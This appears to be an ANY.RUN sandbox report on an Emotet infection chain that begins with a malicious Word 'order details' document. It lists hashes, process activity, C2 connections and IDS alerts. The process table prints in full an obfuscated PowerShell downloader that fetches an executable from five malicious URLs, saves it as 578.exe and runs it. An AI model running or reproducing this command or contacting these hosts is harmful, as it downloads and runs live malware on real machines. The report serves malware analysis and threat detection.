analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://ciadasluvas.com.br/AMAZON/Orders-details/012019

Full analysis: https://app.any.run/tasks/baf6afff-f657-47f5-a9e4-14d4b489b7d7
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 17, 2019, 17:09:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
loader
emotet
feodo
Indicators:
MD5:

F949F28DBEEA332469A346825BB943B2

SHA1:

16BE7997FE15C6F38786C97B3A31A504BBE77CFF

SHA256:

DE99F06200FBF507866A94B4132FAE42E0DA6B092FEAD1E0124ED6ED1F78E499

SSDEEP:

3:N1KdMo/J22QUqXN/oVUc:COoQ2uN/IUc

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2252)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2324)
    • Application was dropped or rewritten from another process

      • 578.exe (PID: 2764)
      • 578.exe (PID: 1848)
      • wabmetagen.exe (PID: 416)
      • wabmetagen.exe (PID: 2944)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2252)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3604)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3604)
    • EMOTET was detected

      • wabmetagen.exe (PID: 2944)
    • Connects to CnC server

      • wabmetagen.exe (PID: 2944)
  • SUSPICIOUS

    • Application launched itself

      • WINWORD.EXE (PID: 2252)
    • Starts Microsoft Office Application

      • iexplore.exe (PID: 2980)
      • WINWORD.EXE (PID: 2252)
    • Creates files in the user directory

      • powershell.exe (PID: 3604)
    • Starts itself from another location

      • 578.exe (PID: 2764)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3604)
      • 578.exe (PID: 2764)
    • Connects to unusual port

      • wabmetagen.exe (PID: 2944)
  • INFO

    • Application launched itself

      • iexplore.exe (PID: 2980)
    • Dropped object may contain Bitcoin addresses

      • iexplore.exe (PID: 3268)
      • WINWORD.EXE (PID: 2252)
    • Creates files in the user directory

      • iexplore.exe (PID: 3268)
      • iexplore.exe (PID: 2980)
      • WINWORD.EXE (PID: 2252)
    • Changes internet zones settings

      • iexplore.exe (PID: 2980)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3268)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3268)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2252)
      • WINWORD.EXE (PID: 3284)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
10
Malicious processes
6
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start iexplore.exe iexplore.exe winword.exe no specs winword.exe no specs cmd.exe no specs powershell.exe 578.exe no specs 578.exe wabmetagen.exe no specs #EMOTET wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
2980"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3268"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2980 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2252"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\order_details_form[1].doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3284"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2324"C:\Windows\system32\cmd.exe" /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $Handmade42='Polarised79';$payment12=new-object Net.WebClient;$Causeway58='http://kosardoor.com/PbEu786@http://www.antique-carpets.com/PIpK4IlRd@http://buyhomecare.net/RyoJj06p@http://adamallorca.org/Jw3mayRvk@http://kynangtuhoc.com/WRCk6xGo9s'.Split('@');$deposit53='synthesize96';$IntelligentSoftChair10 = '578';$RSS70='webenabled71';$Engineer70=$env:public+'\'+$IntelligentSoftChair10+'.exe';foreach($leadingedge49 in $Causeway58){try{$payment12.DownloadFile($leadingedge49, $Engineer70);$ebusiness81='SCSI56';If ((Get-Item $Engineer70).length -ge 80000) {Invoke-Item $Engineer70;$methodologies22='repurpose87';break;}}catch{}}$Sharable45='Licensed84'; C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3604powershell $Handmade42='Polarised79';$payment12=new-object Net.WebClient;$Causeway58='http://kosardoor.com/PbEu786@http://www.antique-carpets.com/PIpK4IlRd@http://buyhomecare.net/RyoJj06p@http://adamallorca.org/Jw3mayRvk@http://kynangtuhoc.com/WRCk6xGo9s'.Split('@');$deposit53='synthesize96';$IntelligentSoftChair10 = '578';$RSS70='webenabled71';$Engineer70=$env:public+'\'+$IntelligentSoftChair10+'.exe';foreach($leadingedge49 in $Causeway58){try{$payment12.DownloadFile($leadingedge49, $Engineer70);$ebusiness81='SCSI56';If ((Get-Item $Engineer70).length -ge 80000) {Invoke-Item $Engineer70;$methodologies22='repurpose87';break;}}catch{}}$Sharable45='Licensed84'; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1848"C:\Users\Public\578.exe" C:\Users\Public\578.exepowershell.exe
User:
admin
Company:
Microsoft Corpor
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.1.760
2764"C:\Users\Public\578.exe"C:\Users\Public\578.exe
578.exe
User:
admin
Company:
Microsoft Corpor
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.1.760
416"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe578.exe
User:
admin
Company:
Microsoft Corpor
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.1.760
2944"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Microsoft Corpor
Integrity Level:
MEDIUM
Version:
6.1.760
Total events
2 674
Read events
2 214
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
4
Text files
6
Unknown types
4

Dropped files

PID
Process
Filename
Type
2980iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF7BD538AD90BC4C08.TMP
MD5:
SHA256:
2252WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA02.tmp.cvr
MD5:
SHA256:
2252WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_43D46CFF-9C37-4B2B-92E0-D53E48337214.0\620142E1.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
3284WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_43D46CFF-9C37-4B2B-92E0-D53E48337214.0\B22DEC71.jpg
MD5:
SHA256:
2252WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2AF0B6E.jpg
MD5:
SHA256:
2980iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFCB26E928830B7AC1.TMP
MD5:
SHA256:
2980iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{A422E1B7-1A7A-11E9-AA93-5254004A04AF}.dat
MD5:
SHA256:
3284WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_43D46CFF-9C37-4B2B-92E0-D53E48337214.0\~WRS{55D1CEE4-1C35-4A61-985C-C6A8F2D24ECD}.tmp
MD5:
SHA256:
3604powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5KWLRWEOWOQLLSW5TZ6Z.temp
MD5:
SHA256:
3284WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_43D46CFF-9C37-4B2B-92E0-D53E48337214.0\~WRF{B38F3602-65E8-4E21-931E-DB4ACE05DAFE}.tmp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
10
DNS requests
8
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3268
iexplore.exe
GET
200
191.6.198.190:80
http://ciadasluvas.com.br/AMAZON/Orders-details/012019/
BR
xml
105 Kb
malicious
2944
wabmetagen.exe
GET
190.55.123.250:80
http://190.55.123.250/
AR
malicious
2944
wabmetagen.exe
GET
200.43.114.10:8080
http://200.43.114.10:8080/
AR
malicious
2944
wabmetagen.exe
GET
189.159.119.242:22
http://189.159.119.242:22/
MX
suspicious
2944
wabmetagen.exe
GET
201.103.81.129:80
http://201.103.81.129/
MX
malicious
3604
powershell.exe
GET
200
51.254.5.128:80
http://adamallorca.org/Jw3mayRvk/
FR
executable
148 Kb
malicious
3268
iexplore.exe
GET
301
191.6.198.190:80
http://ciadasluvas.com.br/AMAZON/Orders-details/012019
BR
html
263 b
malicious
3604
powershell.exe
GET
301
51.254.5.128:80
http://adamallorca.org/Jw3mayRvk
FR
html
241 b
malicious
3604
powershell.exe
GET
200
87.236.16.137:80
http://buyhomecare.net/RyoJj06p
RU
html
274 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2980
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3604
powershell.exe
87.236.16.137:80
buyhomecare.net
Beget Ltd
RU
malicious
3604
powershell.exe
209.217.33.193:80
www.antique-carpets.com
Catalog.com
US
malicious
3604
powershell.exe
178.162.201.213:80
kosardoor.com
Leaseweb Deutschland GmbH
DE
suspicious
3268
iexplore.exe
191.6.198.190:80
ciadasluvas.com.br
IPV6 Internet Ltda
BR
malicious
2944
wabmetagen.exe
201.103.81.129:80
Uninet S.A. de C.V.
MX
malicious
3604
powershell.exe
51.254.5.128:80
adamallorca.org
OVH SAS
FR
malicious
2944
wabmetagen.exe
200.43.114.10:8080
Telecom Argentina S.A.
AR
malicious
2944
wabmetagen.exe
189.159.119.242:22
Uninet S.A. de C.V.
MX
suspicious
2944
wabmetagen.exe
190.55.123.250:80
Telecentro S.A.
AR
malicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
ciadasluvas.com.br
  • 191.6.198.190
malicious
kosardoor.com
  • 178.162.201.213
malicious
www.antique-carpets.com
  • 209.217.33.193
malicious
dns.msftncsi.com
  • 131.107.255.255
shared
buyhomecare.net
  • 87.236.16.137
malicious
adamallorca.org
  • 51.254.5.128
malicious

Threats

PID
Process
Class
Message
3268
iexplore.exe
A Network Trojan was detected
ET TROJAN Possible malicious Office doc hidden in XML file
3604
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3604
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3604
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3604
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3604
powershell.exe
Misc activity
SUSPICIOUS [PTsecurity] AntiDDOS script attempt (malware hosting protection)
3604
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3604
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3604
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2944
wabmetagen.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
2 ETPRO signatures available at the full report
No debug info